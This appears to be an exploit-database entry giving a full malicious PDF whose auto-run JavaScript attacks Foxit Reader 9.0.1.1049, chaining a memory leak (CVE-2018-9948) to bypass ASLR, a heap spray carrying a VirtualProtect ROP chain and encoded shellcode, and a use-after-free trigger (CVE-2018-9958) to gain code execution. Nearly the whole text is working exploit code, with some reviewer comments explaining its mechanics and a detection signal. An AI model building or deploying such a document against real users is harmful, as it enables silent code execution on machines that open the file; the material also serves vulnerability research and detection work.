
Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR & DEP Bypass)

🗓️ 07 Aug 2018 00:00:00Reported by Manoj AhujeType 
exploitdb

Foxit Reader 9.0.1.1049 Buffer Overflow Issue

Code
%PDF 
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>> 
2 0 obj
<</S /JavaScript /JS (
/*

# Exploit Title: Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR)(DEP)
# Date: 2018-08-04
# Exploit Author: Manoj Ahuje
# Tested on: Windows 7 Pro (x32)
# Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
# Version: Foxit Reader 9.0.1.1049
# CVE: N/A
# Credits to "Mr_Me" for Reseach and initial exploit


#Details:
#This exploit makes use of heap space to store the shellcode and, in addition to the UAF, bypasses ASLR and DEP to get successful payload execution

*/
// Globals shared by the functions below.
var heap_ptr  = 0;   // declared here but never read or written again anywhere in this script
var foxit_base = 0;  // FoxitReader.exe load address: written by leak(), read by heap_spray()

/**
 * Allocates `size` ArrayBuffers of 0x10000-0x8 bytes and writes the same
 * Int32 pattern into every one of them:
 *   slots 0x00-0x14  foxit_base-relative addresses (the chain annotated below)
 *   slots 0x15-0x1a  0x90909090
 *   slots 0x1b-0x8a  the constants the author labels "CALCULATOR shellcode"
 *   remaining slots  the filler dword 0x6d616e6a
 * Every address is `foxit_base + offset`, so the contents are only
 * meaningful after leak() has populated the global; with foxit_base still 0
 * the slots hold bare offsets. The offsets belong to the one FoxitReader.exe
 * build identified in leak() and are wrong for any other build.
 * NOTE(review): the block comment inside calls this a VirtualAlloc chain
 * while slot 0x06 is labelled VirtualProtect -- the two labels disagree.
 * Detection angle: an OpenAction script that allocates thousands of
 * ~64 KiB ArrayBuffers and fills them with identical words is itself a
 * strong indicator, independent of the specific offsets.
 * @param {number} size - number of buffers to allocate (the caller passes 0x1000).
 * @returns {undefined} side effect only; the buffers are referenced solely by
 *   the local `arr`, so they are reachable only until this function returns.
 */
function heap_spray(size){
    var arr = new Array(size);
    for (var i = 0; i < arr.length; i++) {
    
        // re-claim and stack pivot-0x8
        arr[i] = new ArrayBuffer(0x10000-0x8);//0xFFF8
        var claimed = new Int32Array(arr[i]);
        var c_length = claimed.length;
   
/* custom made ROP chain virtualalloc call
   Author: Manoj Ahuje
   (slots 0x00-0x03 repeat the same gadget address four times) */
	    
	claimed[0x00] = foxit_base + 0x01A65184; //# PUSH EAX # POP ESP # POP EDI # POP ESI # POP EBX # POP EBP # RETN
	claimed[0x01] = foxit_base + 0x01A65184;
	claimed[0x02] = foxit_base + 0x01A65184;
	claimed[0x03] = foxit_base + 0x01A65184;
        claimed[0x04] = foxit_base + 0x14f9195;  // # POP EBX # RETN
        claimed[0x05] = foxit_base + 0x41414141; // value popped into EBX by the gadget above
	claimed[0x06] = foxit_base + 0x1f224fc;  // # ptr to &VirtualProtect()
        claimed[0x07] = foxit_base + 0x0e70281;  // # MOV ESI,DWORD PTR DS:[EBX] # RETN 
        claimed[0x08] = foxit_base + 0x1582698;  // # POP EBP # RETN 
        claimed[0x09] = foxit_base + 0xa0dbd;    // # & jmp esp 
        claimed[0x0a] = foxit_base + 0x14ed06d;  // # POP EBX # RETN  
        claimed[0x0b] = 0x00000201;              // # 0x00000201-> ebx
        claimed[0x0c] = foxit_base + 0x1e62f7e;  // # POP EDX # RETN  
        claimed[0x0d] = 0x00000040;              // # 0x00000040-> edx
        claimed[0x0e] = foxit_base + 0x1ec06a9;  // # POP ECX # RETN 
        claimed[0x0f] = foxit_base + 0x29bac74;  // # &Writable location 
        claimed[0x10] = foxit_base + 0xb971f;    // # POP EDI # RETN  
        claimed[0x11] = foxit_base + 0x177769e;  // # RETN (ROP NOP) 
        claimed[0x12] = foxit_base + 0x1A89808;  // # POP EAX # RETN 
        claimed[0x13] = 0x90909090;              // # nop
        claimed[0x14] = foxit_base + 0x129d4f0;  // # PUSHAD # RETN  
	claimed[0x15] = 0x90909090;              // slots 0x15-0x1a: 0x90909090 padding
	claimed[0x16] = 0x90909090;
	claimed[0x17] = 0x90909090;
	claimed[0x18] = 0x90909090;
	claimed[0x19] = 0x90909090;
	claimed[0x1a] = 0x90909090;
	    
        //regular CALCULATOR shellcode
        // (slots 0x1b-0x8a; opaque constants, the label is the author's and
        //  is not verifiable from the values alone)
	    
        claimed[0x1b] = 0xe5d9e389;
        claimed[0x1c] = 0x5af473d9;
        claimed[0x1d] = 0x4a4a4a4a;
        claimed[0x1e] = 0x4a4a4a4a;
        claimed[0x1f] = 0x434a4a4a;
        claimed[0x20] = 0x43434343;
        claimed[0x21] = 0x59523743;
        claimed[0x22] = 0x5058416a;
        claimed[0x23] = 0x41304130;
        claimed[0x24] = 0x5141416b;
        claimed[0x25] = 0x32424132;
        claimed[0x26] = 0x42304242;
        claimed[0x27] = 0x58424142;
        claimed[0x28] = 0x42413850;
        claimed[0x29] = 0x49494a75;
        claimed[0x2a] = 0x4e586b6c;
        claimed[0x2b] = 0x57306362;
        claimed[0x2c] = 0x53707770;
        claimed[0x2d] = 0x6b696e50;
        claimed[0x2e] = 0x39716455;
        claimed[0x2f] = 0x6e645050;
        claimed[0x30] = 0x6470426b;
        claimed[0x31] = 0x434b6c70;
        claimed[0x32] = 0x6e6c3662;
        claimed[0x33] = 0x7562436b;
        claimed[0x34] = 0x526b6e44;
        claimed[0x35] = 0x46686452;
        claimed[0x36] = 0x5037386f;
        claimed[0x37] = 0x6446764a;
        claimed[0x38] = 0x4e4f4b71;
        claimed[0x39] = 0x354c774c;
        claimed[0x3a] = 0x776c6131;
        claimed[0x3b] = 0x374c7672;
        claimed[0x3c] = 0x5a614a50;
        claimed[0x3d] = 0x374d746f;
        claimed[0x3e] = 0x38573971;
        claimed[0x3f] = 0x30525a62;
        claimed[0x40] = 0x6e376652;
        claimed[0x41] = 0x6252506b;
        claimed[0x42] = 0x624b6c30;
        claimed[0x43] = 0x6c4c576a;
        claimed[0x44] = 0x476c524b;
        claimed[0x45] = 0x6d387461;
        claimed[0x46] = 0x43587133;
        claimed[0x47] = 0x50513831;
        claimed[0x48] = 0x334b6c51;
        claimed[0x49] = 0x35506769;
        claimed[0x4a] = 0x6e534851;
        claimed[0x4b] = 0x7539576b;
        claimed[0x4c] = 0x54736948;
        claimed[0x4d] = 0x4e79637a;
        claimed[0x4e] = 0x6c64356b;
        claimed[0x4f] = 0x6a51354b;
        claimed[0x50] = 0x39514676;
        claimed[0x51] = 0x6f4c6e6f;
        claimed[0x52] = 0x444f4831;
        claimed[0x53] = 0x4861364d;
        claimed[0x54] = 0x6b783447;
        claimed[0x55] = 0x69357450;
        claimed[0x56] = 0x73337366;
        claimed[0x57] = 0x5568494d;
        claimed[0x58] = 0x474d436b;
        claimed[0x59] = 0x68357454;
        claimed[0x5a] = 0x4e686364;
        claimed[0x5b] = 0x6638466b;
        claimed[0x5c] = 0x59313344;
        claimed[0x5d] = 0x6c766143;
        claimed[0x5e] = 0x506c664b;
        claimed[0x5f] = 0x504b4c4b;
        claimed[0x60] = 0x656c4758;
        claimed[0x61] = 0x6c436951;
        claimed[0x62] = 0x6e34634b;
        claimed[0x63] = 0x6831436b;
        claimed[0x64] = 0x61694e50;
        claimed[0x65] = 0x65746554;
        claimed[0x66] = 0x514b5174;
        claimed[0x67] = 0x7351734b;
        claimed[0x68] = 0x427a6269;
        claimed[0x69] = 0x396f6971;
        claimed[0x6a] = 0x734f5170;
        claimed[0x6b] = 0x4e6a436f;
        claimed[0x6c] = 0x7832526b;
        claimed[0x6d] = 0x316d4e6b;
        claimed[0x6e] = 0x675a534d;
        claimed[0x6f] = 0x4f4d6c71;
        claimed[0x70] = 0x57324875;
        claimed[0x71] = 0x43707770;
        claimed[0x72] = 0x61306630;
        claimed[0x73] = 0x6e514678;
        claimed[0x74] = 0x6e6f706b;
        claimed[0x75] = 0x6b6f5967;
        claimed[0x76] = 0x784b4f65;
        claimed[0x77] = 0x39656d70;
        claimed[0x78] = 0x73565032;
        claimed[0x79] = 0x6c666c58;
        claimed[0x7a] = 0x6d6d4d55;
        claimed[0x7b] = 0x496f494d;
        claimed[0x7c] = 0x456c6545;
        claimed[0x7d] = 0x454c7356;
        claimed[0x7e] = 0x6b306b5a;
        claimed[0x7f] = 0x5370394b;
        claimed[0x80] = 0x4d453445;
        claimed[0x81] = 0x6567426b;
        claimed[0x82] = 0x70426343;
        claimed[0x83] = 0x376a506f;
        claimed[0x84] = 0x6b336670;
        claimed[0x85] = 0x3045694f;
        claimed[0x86] = 0x72313563;
        claimed[0x87] = 0x7633654c;
        claimed[0x88] = 0x4235754e;
        claimed[0x89] = 0x67354558;
        claimed[0x8a] = 0x00414170;

        // Fill the rest of the buffer with one filler dword so every slot is written.
        for (var j = 0x8b; j < c_length; j++) {
            claimed[j] = 0x6d616e6a;
        }
    }
}

function leak(){
    /*
        Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
        ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
        Found By: bit from meepwn team
    */
    // Purpose: derive the FoxitReader.exe load address and store it in the
    // global `foxit_base`. No return value.
    // Relies on `this` being the document object that exposes addAnnot();
    // the function is called from the top-level OpenAction script, so `this`
    // is whatever the viewer binds there (presumably the Doc object -- not
    // verifiable from this file).

    // alloc
    var a = this.addAnnot({type: "Text"});

    // free
    a.destroy();

    // reclaim
    // Per the CVE above, the Int32Array view over a freshly allocated
    // 0x60-byte buffer exposes memory that was not re-initialised.
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);

    // leak the vftable
    // Only the upper 16 bits of the first dword are kept (& 0xffff0000).
    var leaked = stolen[0] & 0xffff0000;

    // a hard coded offset to FoxitReader.exe base v9.0.1.1049 (sha1: a01a5bde0699abda8294d73544a1ec6b4115fa68)
    // The constant is specific to that one build; on any other build the
    // resulting foxit_base is wrong and every `foxit_base + offset` computed
    // in heap_spray() points elsewhere. Nothing here checks that the read
    // actually produced a plausible value.
    foxit_base = leaked-0x01f50000;
}

/**
 * Allocates 0x10 ArrayBuffers of 0x60 bytes (the same size leak() used)
 * and fills each one, through an Int32Array view, with 0x11000048 in the
 * first dword and 0x71727374 in every remaining dword.
 * Called only from the property getter that trigger_uaf() installs, right
 * after that getter destroys the annotation -- its role is to reoccupy the
 * freed memory with controlled contents before the caller resumes.
 * @returns {undefined} side effect only; the buffers are referenced solely by
 *   the local `arr`.
 */
function reclaim(){

    var arr = new Array(0x10);
    for (var i = 0; i < arr.length; i++) {
        arr[i] = new ArrayBuffer(0x60);
        var rop = new Int32Array(arr[i]);
		
        rop[0x00] = 0x11000048;
        
        // every dword after the first gets the same filler value
        for (var j = 0x01; j < rop.length; j++) {
            rop[j] = 0x71727374;
        }
    }
}

function trigger_uaf(){
    /*
        Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
        ZDI-CAN-5620 / ZDI-18-342 / CVE-2018-9958
        Found By: Steven Seeley (mr_me) of Source Incite
    */
    // Purpose: create a Text annotation named "uaf" on page 0, then assign to
    // its `point` property an array whose index-0 getter destroys that same
    // annotation (looked up again via getAnnot(0, "uaf")), calls reclaim(),
    // and only then returns 1. Per the CVE above, the native setter for
    // `point` presumably reads arr[0] while still holding the annotation, so
    // it continues on memory that has been freed and refilled by reclaim().
    // No return value; nothing is stored globally.

    // the getter below runs with its own `this`, so capture the document object here
    var that = this;
    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
    var arr = [1];
    Object.defineProperties(arr,{
        "0":{ 
            get: function () {

                // free
                that.getAnnot(0, "uaf").destroy();

                // reclaim freed memory
                reclaim();
                return 1; 
            }
        }
    });
    // assigning the array is what invokes the getter
    a.point = arr;
}

// Entry sequence. leak() must run first because heap_spray() computes every
// address from the global foxit_base that leak() sets; trigger_uaf() runs
// last, once the spray is in place. None of the three returns a value and
// no step checks whether the previous one succeeded.
leak();
heap_spray(0x1000);

trigger_uaf();

)>> trailer <</Root 1 0 R>>
